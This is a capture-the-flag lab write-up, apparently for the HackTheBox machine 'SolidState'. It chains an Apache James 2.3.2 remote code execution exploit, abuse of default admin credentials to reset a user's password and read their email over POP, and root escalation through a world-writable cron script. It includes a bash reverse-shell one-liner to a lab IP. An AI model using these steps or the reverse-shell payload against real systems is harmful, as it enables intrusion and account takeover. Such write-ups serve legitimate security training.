0% found this document useful (0 votes)
74 views5 pages

Solid State

walkthrogh

Uploaded by

yiwawax804
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
74 views5 pages

Solid State

walkthrogh

Uploaded by

yiwawax804
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

SolidState

18​th​ October 2017 / Document No D17.100.26


Prepared By: Alexander Reid (Arrexel)
Machine Author: ch33zplz
Difficulty: ​Medium
Classification: Official

Page 1 / 5
SYNOPSIS
SolidState is a medium difficulty machine that requires chaining of multiple attack vectors in order
to get a privileged shell. As a note, in some cases the exploit may fail to trigger more than once
and a machine reset is required.

Skills Required Skills Learned

● Intermediate knowledge of Linux ● Exploiting Apache James


● Enumerating ports and services ● Enumerating POP servers
● Chaining vulnerabilities
● Exploiting world-writable files

Page 2 / 5
Enumeration

Nmap

Nmap reveals OpenSSH, Apache, an SMTP server as well as Apache James POP and admin
servers.

Page 3 / 5
Exploitation

Apache James

Exploit: ​https://www.exploit-db.com/exploits/35513/

Looking into Apache James 2.3.2, there is a remote code execution vulnerability, however it
requires valid credentials. Luckily, the server has the default credentials used in the proof of
concept.

Modification of the exploit is very straight forward. Simply change the the payload variable to
create a reverse connection. The easiest way is with ​bash -i >& /dev/tcp/<LAB IP>/<PORT> 0>&1

The exploit will trigger as soon as a user logs on to the system. By connecting via telnet as the
root user, it is possible to change the credentials of other accounts. After changing the ​mindy
user’s password with ​setpassword mindy writeup​, it is possible to telnet into the POP server and
read emails. Once connected with ​telnet 10.10.10.51 110​, entering ​USER mindy​ and ​PASS
writeup​ will gain access. The commands ​LIST ​and ​RETR 2 ​will list and view the user’s emails, and
in the process expose valid SSH credentials for the ​mindy​ user. Logging in via SSH will trigger
the remote code execution exploit and grant an unrestricted user shell through the previously set
up payload.

Page 4 / 5
Privilege Escalation

LinEnum: ​https://github.com/rebootuser/LinEnum

Running LinEnum generates a very detailed report. The scan reveals a non-standard and
world-writeable Python script owned by root.

Creating a file in ​/tmp​ and waiting reveals that the script is run regularly. By appending some
code to the end of the file or replacing it completely, it is trivial to achieve a root shell. The flags
can be obtained from ​/home/mindy/user.txt ​and ​/root/root.txt

Page 5 / 5

You might also like